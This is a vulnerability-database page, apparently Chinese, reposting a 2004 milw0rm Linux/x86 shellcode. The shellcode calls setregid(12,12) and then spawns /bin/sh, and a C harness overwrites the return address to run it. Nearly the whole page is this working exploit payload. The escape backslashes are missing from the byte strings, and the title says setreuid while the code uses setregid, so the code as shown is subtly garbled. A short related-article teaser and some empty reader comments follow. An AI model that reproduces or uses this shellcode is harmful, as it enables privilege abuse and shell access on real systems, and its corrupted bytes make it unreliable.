Linux/x86 – execve(/bin/sh) + setreuid(12,12) Shellcode (50 bytes)
漏洞ID | 1054608 | 漏洞类型 | |
发布时间 | 2004-09-12 | 更新时间 | 2004-09-12 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Linux_x86 | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
* Linux/x86
* An example of setregid(), execve() /bin/sh
*
* (I used this in practise, hence the setregid(12, 12);)
*/
#include <stdio.h>
char c0de[] =
/* main: */ /* setregid(12, 12); */
"x29xc0" /* subl %eax, %eax */
"xb0x47" /* movb $71, %al */
"x29xdb" /* subl %ebx, %ebx */
/*
* Here's the GID for the setregid() call. Change to suit.
*/
"xb3x0c" /* movb $12, %bl */
"x89xd9" /* movl %ebx, %ecx */
"xcdx80" /* int $0x80 */
"xebx18" /* jmp callz */
/* start: */ /* execve of /bin/sh */
"x5e" /* popl %esi */
"x29xc0" /* subl %eax, %eax */
"x88x46x07" /* movb %al, 0x07(%esi) */
"x89x46x0c" /* movl %eax, 0x0c(%esi) */
"x89x76x08" /* movl %esi, 0x08(%esi) */
"xb0x0b" /* movb $0x0b, %al */
"x87xf3" /* xchgl %esi, %ebx */
"x8dx4bx08" /* leal 0x08(%ebx), %ecx */
"x8dx53x0c" /* leal 0x0c(%ebx), %edx */
"xcdx80" /* int $0x80 */
/* callz: */
"xe8xe3xffxffxff" /* call start */
/* /bin/sh */
"x2fx62x69x6ex2fx73x68";
main() {
int *ret;
ret=(int *)&ret +2;
printf("Shellcode lenght=%dn",strlen(c0de));
(*ret) = (int)c0de;
}
// milw0rm.com [2004-09-12]
相关推荐: MySimpleNews Remotely Readable Administrator Password Vulnerability
MySimpleNews Remotely Readable Administrator Password Vulnerability 漏洞ID 1101485 漏洞类型 Design Error 发布时间 2002-10-02 更新时间 2002-10-02…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666